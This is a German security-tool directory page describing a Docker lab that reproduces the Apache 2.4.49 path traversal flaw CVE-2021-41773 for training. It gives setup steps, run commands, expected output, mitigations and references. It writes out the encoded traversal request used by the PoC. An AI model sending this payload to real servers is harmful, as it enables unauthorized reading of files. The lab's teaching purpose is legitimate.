Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-41773-Apache-Lab — Docker-basiertes Labor zur Reproduktion von CVE-2021-41773 (Apache HTTP Server 2.4.49) durch kontrollierten Path Traversal und Dateioffenlegung unter Verwendung eines eigenen Python-PoC. | Kitploit
Tools/GitHubGitHub/s-amnajafri/cve-2021-41773-apache-lab
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsLernen & BildungLabs & Praxis
GitHubs-amnajafri/cve-2021-41773-apache-lab

CVE-2021-41773-Apache-Lab

Docker-basiertes Labor zur Reproduktion von CVE-2021-41773 (Apache HTTP Server 2.4.49) durch kontrollierten Path Traversal und Dateioffenlegung unter Verwendung eines eigenen Python-PoC.

Repository anzeigen
1vor 27 TagenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2021-41773 — Apache HTTP Server 2.4.49 Labor

Reproduktion von CVE-2021-41773, einer Path-Traversal-Schwachstelle in Apache HTTP Server 2.4.49.

Dieses Projekt verwendet Docker, um eine isolierte verwundbare Umgebung zu erstellen, sowie einen Python-PoC, um eine kontrollierte Datei-Offenlegung zu demonstrieren.

Sicherheit: Der PoC akzeptiert nur localhost, 127.0.0.1 oder ::1 als Ziele. Tests müssen innerhalb des isolierten Labors durchgeführt werden.

Zielsetzung

Dieses Projekt demonstriert:

  • Einrichtung von Apache HTTP Server 2.4.49 in Docker
  • Überprüfung der verwundbaren Apache-Version
  • Reproduktion von CVE-2021-41773
  • Demonstration kontrollierter Datei-Offenlegung
  • Entwicklung eines eigenen Python-PoC
  • Sammlung von Nachweisen zur Ausnutzung
  • Dokumentation von Gegenmaßnahmen

Die Demonstration konzentriert sich auf Datei-Offenlegung und nicht auf Remote-Codeausführung.

Projektstruktur

root@kitploit:~
CVE-2021-41773-Apache-Lab/
│
├── docker/
│   ├── Dockerfile
│   ├── httpd-vulnerable.conf
│   └── secret.txt
│
├── exploit/
│   └── exploit.py
│
├── screenshots/
│   ├── 01-docker-container.png
│   ├── 02-apache-version.png
│   └── 03-successful-exploit.png
│
├── report/
│   └── CVE-2021-41773-Exploit-Report.pdf
│
├── requirements.txt
├── .gitignore
└── README.md

Voraussetzungen

  • Docker
  • Python 3.x
  • Git

Der PoC verwendet ausschließlich Pythons Standardbibliothek und benötigt keine Python-Pakete von Drittanbietern.

Labor-Einrichtung

1. Docker-Image erstellen

Aus dem Repository-Stammverzeichnis:

root@kitploit:~
docker build -t cve-2021-41773-lab ./docker

2. Verwundbaren Apache-Server starten

root@kitploit:~
docker run --rm --name cve-2021-41773-lab \
  -p 127.0.0.1:8080:80 \
  cve-2021-41773-lab

Lassen Sie dieses Terminal geöffnet.

Der Apache-Dienst ist ausschließlich über Folgendes erreichbar:

root@kitploit:~
127.0.0.1:8080

Überprüfung

Container überprüfen

In einem weiteren Terminal:

root@kitploit:~
docker ps

Der Container sollte Folgendes anzeigen:

root@kitploit:~
127.0.0.1:8080->80/tcp

Apache-Version überprüfen

root@kitploit:~
docker exec cve-2021-41773-lab httpd -v

Erwartete Ausgabe:

root@kitploit:~
Server version: Apache/2.4.49 (Unix)

Normalen HTTP-Zugriff überprüfen

root@kitploit:~
curl http://127.0.0.1:8080/

Die Apache-Testseite sollte zurückgegeben werden.

Ausnutzung

Der PoC befindet sich unter:

root@kitploit:~
exploit/exploit.py

Ausführen:

root@kitploit:~
python3 exploit/exploit.py

Das Standardziel ist:

root@kitploit:~
http://127.0.0.1:8080

Die Standard-Nachweisdatei ist:

root@kitploit:~
/lab/secret.txt

Ein erfolgreicher Lauf erzeugt:

root@kitploit:~
[+] Vulnerability reproduced.
[+] Controlled file disclosure confirmed.

Anschließend zeigt der PoC den Inhalt der kontrollierten Labordatei an.

So funktioniert der PoC

Der PoC prüft zunächst, ob das Ziel eine lokale Adresse ist:

root@kitploit:~
localhost
127.0.0.1
::1

Anschließend erstellt er einen Pfad, der codierte Traversal-Komponenten enthält:

root@kitploit:~
/cgi-bin/.%2e/.%2e/.%2e/.%2e/lab/secret.txt

Die Anfrage wird über Pythons Standardmodul socket gesendet. Dadurch erhält der PoC die direkte Kontrolle über den HTTP-Anfragepfad.

Der verwundbare Apache-2.4.49-Server verarbeitet den präparierten Pfad und gibt den Inhalt von Folgendem zurück:

root@kitploit:~
/lab/secret.txt

Das Abrufen dieser Datei bestätigt die Path-Traversal-Schwachstelle und die kontrollierte Datei-Offenlegung.

Zusammenfassung der Schwachstelle

CVE: CVE-2021-41773

Produkt: Apache HTTP Server

Demonstrierte betroffene Version: 2.4.49

Schwachstellentyp: Path Traversal / Datei-Offenlegung

CVE-2021-41773 ist eine Path-Traversal-Schwachstelle in Apache HTTP Server 2.4.49. Eine speziell präparierte URL kann vorgesehene Pfadbeschränkungen umgehen und Zugriff auf Dateien außerhalb des erwarteten Verzeichnisses ermöglichen.

Unter bestimmten Konfigurationen kann die Schwachstelle schwerwiegendere Folgen haben. Dieses Projekt demonstriert bewusst die kontrollierte Datei-Offenlegung in einer isolierten Docker-Umgebung.

Nachweise

Die während der Tests gesammelten Screenshots werden unter folgendem Pfad gespeichert:

root@kitploit:~
evidence/

Zu den Nachweisen gehören:

  1. Laufender Docker-Container
  2. Versionsüberprüfung von Apache HTTP Server 2.4.49
  3. Erfolgreiche Ausführung des Python-PoC

Gegenmaßnahmen

Die primäre Gegenmaßnahme ist ein Upgrade von Apache HTTP Server auf eine behobene Version.

Weitere defensive Maßnahmen umfassen:

  • Halten Sie Apache regelmäßig gepatcht.
  • Schränken Sie den Zugriff auf sensible Dateien ein.
  • Überprüfen Sie Alias- und CGI-Konfigurationen.
  • Wenden Sie das Prinzip der geringsten Rechte an.
  • Vermeiden Sie es, unnötige Dienste zu exponieren.
  • Überwachen Sie Server-Logs auf verdächtige Path-Traversal-Anfragen.

Referenzen

  • Sicherheitshinweis von Apache HTTP Server: https://httpd.apache.org/security/vulnerabilities_24.html

  • NIST National Vulnerability Database: https://nvd.nist.gov/vuln/detail/CVE-2021-41773

  • CERT-EU-Sicherheitshinweis: https://cert.europa.eu/publications/security-advisories/2021-054/

Haftungsausschluss

Dieses Projekt ist ausschließlich für autorisierte Sicherheitsschulungen und kontrollierte Labortests bestimmt.

Die Docker-Umgebung und der PoC sind für lokale Tests ausgelegt. Verwenden Sie den PoC nicht gegen Systeme, die Sie nicht besitzen oder für deren Bewertung Sie keine ausdrückliche Genehmigung haben.

Tool herunterladen